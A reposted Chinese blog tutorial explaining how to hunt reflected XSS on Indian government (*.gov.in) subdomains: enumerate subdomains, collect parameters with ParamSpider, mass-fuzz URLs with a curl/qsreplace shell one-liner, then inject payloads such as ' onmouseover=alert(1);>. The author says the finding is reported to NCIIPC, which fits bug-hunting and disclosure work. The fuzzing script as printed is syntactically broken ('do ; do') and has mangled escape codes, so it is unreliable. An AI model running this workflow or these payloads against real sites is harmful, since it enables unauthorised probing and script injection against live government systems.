如何在*.Gov.in发现Reflected XSS

admin 2024年5月21日22:56:38评论3 views字数 800阅读2分40秒阅读模式

什么是Reflected XSS

Reflected XSS(反射型XSS)是一种安全漏洞,当应用程序接收 HTTP 请求中的数据并将其存储在响应中而没有对其进行正确过滤和清理时,就会发生这种情况。

让我们一步一步来

选择域名:*.gov.in
第1步查找所选域下所有可能的子域
第2步:选择任意一个子域
第3步:使用Paramspider等工具找出所有可能的参数
https://github.com/devanshbatham/ParamSpider
如何在*.Gov.in发现Reflected XSS

第4步:检查所有直接反映特殊字符的 url。

要自动化,请使用以下脚本:
cat urls.txt| egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs ""><()" && echo -e "$host �33[91m Vullnerable e[0m n" || echo -e "$host  �33[92m Not Vulnerable e[0m n"; done | tee XSS.txt
如何在*.Gov.in发现Reflected XSS

该脚本将这些参数显示为易受攻击的:

如何在*.Gov.in发现Reflected XSS

第5步:立即手动尝试:

让我们尝试一下基本的 XSS 负载:
"><script>alert(1);</script>

 

不起作用:

如何在*.Gov.in发现Reflected XSS
如何在*.Gov.in发现Reflected XSS

无弹出窗口:

如何在*.Gov.in发现Reflected XSS

让我们从头开始

只需尝试:单引号

'
如何在*.Gov.in发现Reflected XSS

不存在输入验证或清理:

现在尝试一些事件:

' onmouseover=alert(1);>
如何在*.Gov.in发现Reflected XSS

输入有效负载后将鼠标悬停在链接上即可执行它。

我们看一下源代码:
如何在*.Gov.in发现Reflected XSS

我们遇到了 XSS,现在向 NCIIPC 报告

如何在*.Gov.in发现Reflected XSS

如何在*.Gov.in发现Reflected XSS

原文始发于微信公众号(潇湘信安):如何在*.Gov.in发现Reflected XSS

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月21日22:56:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   如何在*.Gov.in发现Reflected XSShttps://cn-sec.com/archives/2017662.html

发表评论

匿名网友 填写信息